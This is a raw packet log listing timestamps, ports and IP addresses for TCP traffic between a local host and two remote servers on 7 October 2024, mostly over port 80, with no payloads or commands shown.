Oct 7, 2024 03:15:44.085414886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085433006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085448027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085465908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085499048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085513115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085530996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085546017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085565090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085577965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085597992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085613012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085633039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085647106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085665941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085679054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085700035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085715055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085733891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085748911 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085767031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085776091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085799932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085815907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085834980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085859060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085865974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085889101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085901976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085916042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.085933924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085968018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.085982084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.086000919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.086015940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.086035967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.086050987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.086085081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173223019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173299074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173341990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173372984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173397064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173398972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173446894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173475027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173525095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173532009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173568964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173583984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173623085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173624039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173675060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173677921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173728943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173731089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173764944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173779011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173799038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173815012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173846006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173851013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173897982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173902035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173934937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.173949003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173981905 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.173988104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174022913 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174037933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174068928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174079895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174113989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174128056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174146891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174163103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174195051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174204111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174252033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174256086 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174292088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174304962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174340010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174344063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174376965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174392939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174424887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174427986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174463987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174478054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174513102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174518108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174561977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174570084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174619913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174621105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174654961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174670935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174686909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174701929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174731016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174734116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174779892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174787998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174837112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174843073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174890995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174897909 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174945116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.174951077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174983978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.174998999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175031900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175036907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175085068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175087929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175132990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175138950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175185919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175192118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175225019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175240040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175257921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175271988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175291061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175309896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175323963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175338030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175357103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175370932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175405979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175426960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175461054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175473928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175493956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175508022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175529957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175543070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175566912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175576925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175601959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175615072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175633907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175647974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175668001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175681114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175702095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175715923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175735950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175750017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175769091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175784111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175802946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175815105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175837040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175848961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175870895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175884962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175904036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175919056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175936937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175951004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.175968885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.175983906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176004887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176016092 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176035881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176050901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176069021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176084042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176104069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176119089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176136971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176151037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176177025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176184893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176211119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176245928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176261902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176279068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176295042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176314116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176330090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176347017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176361084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176379919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176398993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176412106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176425934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176445961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176459074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176480055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176495075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176512003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176527023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176564932 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176578999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176599026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176615000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176632881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176647902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176666975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176682949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176701069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176716089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176736116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176747084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176769018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176783085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176801920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176815033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176836967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176847935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176871061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176884890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176903963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176918030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176938057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176953077 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.176970959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.176985979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177005053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177017927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177037954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177053928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177072048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177086115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177104950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177119017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177139997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177151918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177174091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177186966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177207947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177222967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177237034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177253008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177269936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177285910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177305937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177316904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177340031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177351952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177375078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177390099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177412987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177417040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177447081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177460909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177479029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177494049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177512884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177525997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177544117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177558899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177577972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177592993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177612066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177624941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177650928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177660942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177680016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.177697897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.177733898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.184881926 CEST	443	49861	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.185463905 CEST	49861	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.185497046 CEST	443	49861	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.185961008 CEST	49861	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:44.185969114 CEST	443	49861	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:44.264064074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264100075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264158010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264204979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264213085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264252901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264266014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264281988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264300108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264317036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264348030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264360905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264413118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264446974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264456987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264487028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264498949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264511108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264550924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264584064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264605045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264616966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264641047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264668941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264668941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264703035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264734983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264750004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264770031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264785051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264799118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264816046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264844894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264848948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264894009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264900923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264934063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.264950991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264980078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.264982939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265012026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265031099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265044928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265067101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265090942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265095949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265150070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265166044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265197039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265202999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265252113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265253067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265301943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265306950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265341997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265357018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265388966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265392065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265424013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265440941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265456915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265470982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:44.265490055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:44.265505075 CEST	49782	80	192.168.2.5	95.164.90.97
